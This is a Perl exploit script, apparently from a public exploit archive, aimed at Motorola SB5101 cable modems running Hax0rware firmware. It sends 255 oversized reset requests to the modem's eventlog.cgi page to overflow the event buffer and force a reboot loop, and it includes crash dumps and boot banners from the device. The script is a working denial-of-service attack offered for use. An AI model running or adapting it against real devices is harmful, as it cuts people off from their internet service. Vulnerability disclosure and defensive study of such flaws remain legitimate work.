#!/usr/bin/perl # Motorola SB5101 Hax0rware Event Reset Remote Overflow # Tested on Hax0rware 1.1 R30, R32 and R39 # Author: Dillon Beresford # Date: 6/6/2010 # Vendor: Motorola Corporation and SBHacker ( SBHacker has been notified of the vuln ). # Software Link: http://www.sbhacker.net/forum/index.php # Description: Motorola SB5101 Hax0rware Event Reset Remote Buffer Overflow # An unauthenticated attacker could send multiple log reset requests to eventlog.cgi, # causing a a denial of service, which would send the cable modem into a reboot loop. # For debugging telnet into the device 192.168.100.1 and run the poc. # >>> YIKES... looks like you may have a problem! <<< # r0/zero=00000000 r1/at=80510000 r2/v0=00000000 r3/v1=00000002 # r4/a0=ac100102 r5/a1=00000000 r6/a2=00000001 r7/a3=8069b914 # r8/t0=00000001 r9/t1=00000000 r10/t2 =00000001 r11/t3 =00000000 # r12/t4 =00000000 r13/t5 =00000000 r14/t6 =00000000 r15/t7 =00000005 # r16/s0 =807bd04c r17/s1 =807bd004 r18/s2 =807bd000 r19/s3 =8069bb90 # r20/s4 =8069bb88 r21/s5 =11110015 r22/s6 =11110016 r23/s7 =11110017 # r24/t8 =00000000 r25/t9 =00000009 r26/k0 =807d2698 r27/k1 =8069bc7c # r28/gp =80458fa0 r29/sp =8069b910 r30/fp =8069b970 r31/ra =80197d24 # PC : 0x80197e14error addr: 0xac100102 # cause: 0x00000010status: 0x1000ff03 # BCM interrupt enable: fffffff7, status: 00000000 # Instruction at PC: 0x8c830000 # entry 80197c58called from 801dbe10 # entry 801dbd08called from 80242f64 # entry 80242eb8called from 802fb2e4 # entry 802fb2accalled from 802fb2a4 # entry 802fb2acReturn address (00000000) invalid.Trace stops. # Task: NetToMedia Thread # --------------------------------------------------- # ID: 0x0025 # Handle: 0x8069ba24 # Set Priority: 23 # Current Priority: 23 # State:SUSP # Stack Base: 0x8069a9b0 # Stack Size: 4096 bytes # Stack Used: 1088 bytes # Stack StackStack # TaskId TaskNamePriority StateSizeUsed Margin # ---------- ------------------------------------------------------------------------ # 0x8048f818 Idle Thread31 RUN 20481064 984 # 0x805131d0 Network alarm support 6 SLEEP 225612321024 # 0x804924c8 Network support 7 SLEEP 819218246368 # 0x80513f20pthread.0000080015EXIT 785211046748 # 0x8048a1c8tStartup18 SLEEP1228852087080 # 0x8054b9ac Rajko HttpD23 SLEEP 328021641116 # 0x807f579cNonVol Device Async Helper25 SLEEP 3072 5042568 # 0x807ebc7cMotorola Standby Switch Thread23 SLEEP 4096 4403656 # 0x807ea984Motorola Vendor Ctl Thread23 SLEEP 4096 5123584 # 0x807f64e8WDOG17 RUN 512027842336 # 0x807e8eb0 BFC Ping Thread29 SLEEP 6144 4765668 # 0x807e870c ConsoleThread27 RUN368642168 34696 # 0x807d6c58 TelnetD23 RUN 22562040 216 # 0x807ca564CfgVB Thread23 SLEEP 4096 5163580 # 0x807c5400DHCM25 SLEEP16384 516 15868 # 0x807bf390 Event25 SLEEP0 0 0 OVERFLOW # 0x8079a900Time Of Day Thread23 SLEEP 6144 4605684 # 0x8079ad70CmDocsisIpThread23 SLEEP 8192 5087684 # 0x80793edc CmBpiManagerThd25 SLEEP 8192 5127680 # 0x8079035c CmDsxHelper23 SLEEP 8192 5087684 # 0x807ac334 CmDocsisCtlThread21 SLEEP 8192 5167676 # 0x80789228Scan Downstream Thread23 SLEEP 409614162680 # 0x80786004RateShaping Thread23 SLEEP 4096 4483648 # 0x807f65e0CMHL23 SLEEP 4500 3724128 # 0x807f66d8CMHH21 SLEEP 4500 3564144 # 0x807f67d0ENRX23 SLEEP 450012483252 # 0x807f68c8ENTX23 SLEEP 4500 7883712 # 0x807f69c0ELNK23 SLEEP 4500 3244176 # 0x807f6ab8USTX23 SLEEP 4500 3444156 # 0x807f6bb0USRX23 SLEEP 4500 3764124 # 0x807f6ca8UBCT19 SLEEP 4500 3604140 # 0x807f6da0USRN23 SLEEP 4500 3444156 # 0x806a5e18DHCP Client Thread23 SLEEP12288 512 11776 # 0x807f6e98IpHalIst23 RUN 4500 8163684 # 0x8069ff7cCmPropaneCtlThread23 SLEEP 819216326560 # 0x8069d320 IGMP Thread23 SLEEP 4096 4603636 # 0x8069ba24 NetToMedia Thread23SUSP 409610883008 # 0x8069798c Trap Thread23 SLEEP16384 504 15880 # 0x807f6030 SNMP Thread23 SLEEP204801196 19284 # 0x805aaf20DHCP Server Thread23 SLEEP 819214486744 # 0x8047b410tNonVolTimer30 SLEEP 2048 2921756 # * * #*** *** #*** *** #*** *** # ***** ***** # ***** ***** # ***** ***** #******* ******* #******* ******* #******* ******* # ********* ********* # ********* ********* # ******* ******* #********* #*** * *** #** ** # ** ** # ** ** #** ** #* * #MotorolaCorporation # +----------------------------------------------------------------------------+ # | _/_/ _/_/_/_/_/_/| # |_/_/ _/_/_/ Broadband | # | _/_/ _/_/| # |_/_/ _/_/_/_/ Foundation| # | _/_/ _/_/| # |_/ _/_/_/_/ Classes | # | _/_/_/ _/_/_/| # || # | Copyright (c) 1999 - 2007 Broadcom Corporation | # || # | Revision:3.9.33.3 RELEASE| # || # | Features:Console Nonvol Fat HeapManager SNMP Networking USB1.1 | # +----------------------------------------------------------------------------+ # | Standard Embedded Target Support for BFC | # || # | Copyright (c) 2003 - 2007 Broadcom Corporation | # || # | Revision:3.0.1 RELEASE | # || # | Features:PID=0xc011 Bootloader-Rev=2.1.6d| # | Copyright (c) 2003 - 2007 Broadcom Corporation | # || # | Revision:3.0.1 RELEASE | # || # | Features:PID=0xc011 Bootloader-Rev=2.1.6d| # | Features:Bootloader-Compression-Support=0x19 | # +----------------------------------------------------------------------------+ # | eCos BFC Application Layer | # || # | Copyright (c) 1999 - 2007 Broadcom Corporation | # || # | Revision:3.0.2 RELEASE | # || # | Features:eCos Console Cmds, (no Idle Loop Profiler)| # +----------------------------------------------------------------------------+ # | _/_/_/ _/| # |_/_/_/_/ _/_/ DOCSIS Cable Modem| # | _/_/_/ _/| # |_/_/ _/ | # | _/_/ _/| # |_/_/_/ _/ | # | _/_/_/ _/| # || # | Copyright (c) 1999 - 2005 Broadcom Corporation | # || # | Revision:3.9.33.3 RELEASE| # || # | Features:AckCel(tm) DOCSIS 1.0/1.1/2.0 Propane(tm) CM SNMP w/Factory MIB | # | Features:Support CM Vendor Extension | # +----------------------------------------------------------------------------+ # | Motorola Data-Only CM Vendor Extension | # || # | Revision:3.0.0a RELEASE| # || # | Features:DHCP ServerHTTP Server| # +----------------------------------------------------------------------------+ # | Build Date:Apr 29 2009 | # | Build Time:15:08:51| # | Built By:vobadm02| # +----------------------------------------------------------------------------+ use LWP::Simple; my $junk = "\x31" x 8096; print "+---------------------------------------------------------------+\n". "| Motorola SB5101 Hax0rware Event Reset Remote Overflow |\n". "| Motorola: SB5101-2.7.6.0-GA-00-NOSH |\n". "| Version: 1.1 R30, R32 and R39 |\n". "| Vendor: Motorola Corporation and SBHacker |\n". "| Author: Dillon Beresford|\n". "| Date: 6/6/2010|\n". "+---------------------------------------------------------------+\n"; for ($count = 1; $count < 256; $count++) { $contents = get("http://192.168.100.1/eventlog.cgi?reset=".$junk); print "sending request to cable modem\n"; } print "We killed it!\n";
体验盒子
